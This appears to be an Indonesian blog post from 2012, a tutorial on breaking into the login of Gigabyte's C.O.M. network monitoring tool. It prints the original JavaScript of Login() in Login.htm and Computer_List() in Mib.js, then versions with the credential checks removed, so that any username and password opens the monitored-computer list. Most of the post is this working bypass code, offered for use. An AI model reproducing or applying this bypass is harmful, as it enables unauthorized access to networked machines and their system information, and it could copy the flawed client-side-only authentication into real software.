Kamis, 26 Januari 2012

Hacking GIGABYTE C.O.M. (Corporate Online Manager).

Saat membeli motherboard merk Gigabyte yang keluar akhir-akhir ini anda pasti akan mendapatkan program bernama C.O.M pada CD driver motherboard tersebut. 

Program ini digunakan untuk memonitoring status kesehatan PC yang di install di server, lalu bisa memasukan computer-komputer didalam jaringan untuk dimonitoring. Dan program ini adalah web-based sehingga bisa diakses dari seluruh jaringan.

Pada kesempatan ini saya akan memberikan tutorial untuk menembus login pada aplikasi tersebut agar bisa masuk dengan sembarang username dan password.

C.O.M pempunyai default installation folder di C:\Program Files\GIGABYTE\C.O.M, semua aplikasi C.O.M adalah HTML + JavaScript, tetapi untuk hacking ini anda tidak perlu mempelajari HTML dan JavaScript cukup logika IF saja.

Saat aplikasi C.O.M dibuka lewat browser, muncul menu utama dan satu hyperlink untuk login. Saat di klik akan muncul window baru dengan tampilan 2 textbox username dan password. Klik kanan di window login tersebut lalu pilih View Source, walaaaa security-nya langsung terlihat. Ganti bagian berikut:

function Login()
{
       var UID,PWD;
       UID=document.all.UA.UID.value;
       PWD=document.all.UA.PWD.value;
       if(window.opener.parent.left.Jimmyobj.CheckACC(UID,PWD)==0)
       {
              window.opener.parent.left.document.all.COM_Menu.style.display='';
              window.opener.parent.left.document.all.Log_Menu.style.display='none'      
              window.close();
       }
       else
       {
              alert('Please try again!')
       }
}


Menjadi

function Login()
{             window.opener.parent.left.document.all.COM_Menu.style.display='';
              window.opener.parent.left.document.all.Log_Menu.style.display='none'      
              window.close();
}

Lalu simpan (C:\Program Files\GIGABYTE\C.O.M\Login.htm), buka lagi C.O.M-nya atau di Refresh bila masih terbuka. Dan lakukan login sekali lagi dengan sembarang username dan password. Wallaaaa anda sudah masuk ke menu utama sekarang. Tetapi saat meng-click computer list anda masih belum bisa masuk ke dalamnya walaupun sudah melewati form login sekali lagi. Bahkan menu “add computer” tidak berfungsi.

Lakukan satu langkah lagi, buka file C:\Program Files\GIGABYTE\C.O.M\Mib.js dengan notepad lalu ganti :

function Computer_List()
{
       var LogWin;
       var X1,Y1,Pos;      
       var Table_Str;
       if(parent.left.Jimmyobj.Logflag==0)
       {
              X1=(screen.width - 500)/2;
              Y1=(screen.height - 200)/2;
              Pos='width=500,height=200,left=' + X1 + ',top=' + Y1 + ',location=no,menubar=no,status=yes,scrollbars=no'
              window.open('Login.htm','abc',Pos);     
             
       }
       else
       {
              Mib_Table.innerHTML='';
              Check_CMP_List()
              Table_Str='';
              Table_Str=Table_Str+TableHead("Computer List","") ;
              Write_Computer_List_Tool();
                     Table_Str=Table_Str+tableitem("Computer Name","Computer Status","Operating System","BIOS Information","MB Model Name","System Information");
              for(i=0;i<top.left.Computer_Count;i++)
              {
                     Table_Str=Table_Str+tableitem('<input type="checkbox" name="Sel_' + top.left.ip[i] + '" onClick=Sel_Cmp("' + top.left.ip[i] + '",'+ i + ')>' + top.left.Cmp_Name[i] + '(' + top.left.ip[i] + ')<div id="P_' + top.left.ip[i] +'"></div>','<div id="S_' + top.left.ip[i] + '"></div>',Get_Value(top.left.ip[i],0),Get_Value(top.left.ip[i],1),Get_Value(top.left.ip[i],2),'<input type=button name="V_' + top.left.ip[i] + '" value="View Info" onClick=Show_Detel_Info("' + top.left.ip[i] + '","' + top.left.Cmp_Name[i] + '")>');
              }    
                     Table_Str=Table_Str+tableBottom();
              Mib_Table.innerHTML=Table_Str;
              Get_Trap();
       }
}

Menjadi:

function Computer_List()
{
              Mib_Table.innerHTML='';
              Check_CMP_List()
              Table_Str='';
              Table_Str=Table_Str+TableHead("Computer List","") ;
              Write_Computer_List_Tool();
                     Table_Str=Table_Str+tableitem("Computer Name","Computer Status","Operating System","BIOS Information","MB Model Name","System Information");
              for(i=0;i<top.left.Computer_Count;i++)
              {
                     Table_Str=Table_Str+tableitem('<input type="checkbox" name="Sel_' + top.left.ip[i] + '" onClick=Sel_Cmp("' + top.left.ip[i] + '",'+ i + ')>' + top.left.Cmp_Name[i] + '(' + top.left.ip[i] + ')<div id="P_' + top.left.ip[i] +'"></div>','<div id="S_' + top.left.ip[i] + '"></div>',Get_Value(top.left.ip[i],0),Get_Value(top.left.ip[i],1),Get_Value(top.left.ip[i],2),'<input type=button name="V_' + top.left.ip[i] + '" value="View Info" onClick=Show_Detel_Info("' + top.left.ip[i] + '","' + top.left.Cmp_Name[i] + '")>');
              }    
                     Table_Str=Table_Str+tableBottom();
              Mib_Table.innerHTML=Table_Str;
              Get_Trap();
}
Lalu simpan (C:\Program Files\GIGABYTE\C.O.M\Mib.js), tutup C.O.M, lalu login kembali, maka semua function sudah bisa dipakai.


Diposting oleh di 21.21

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)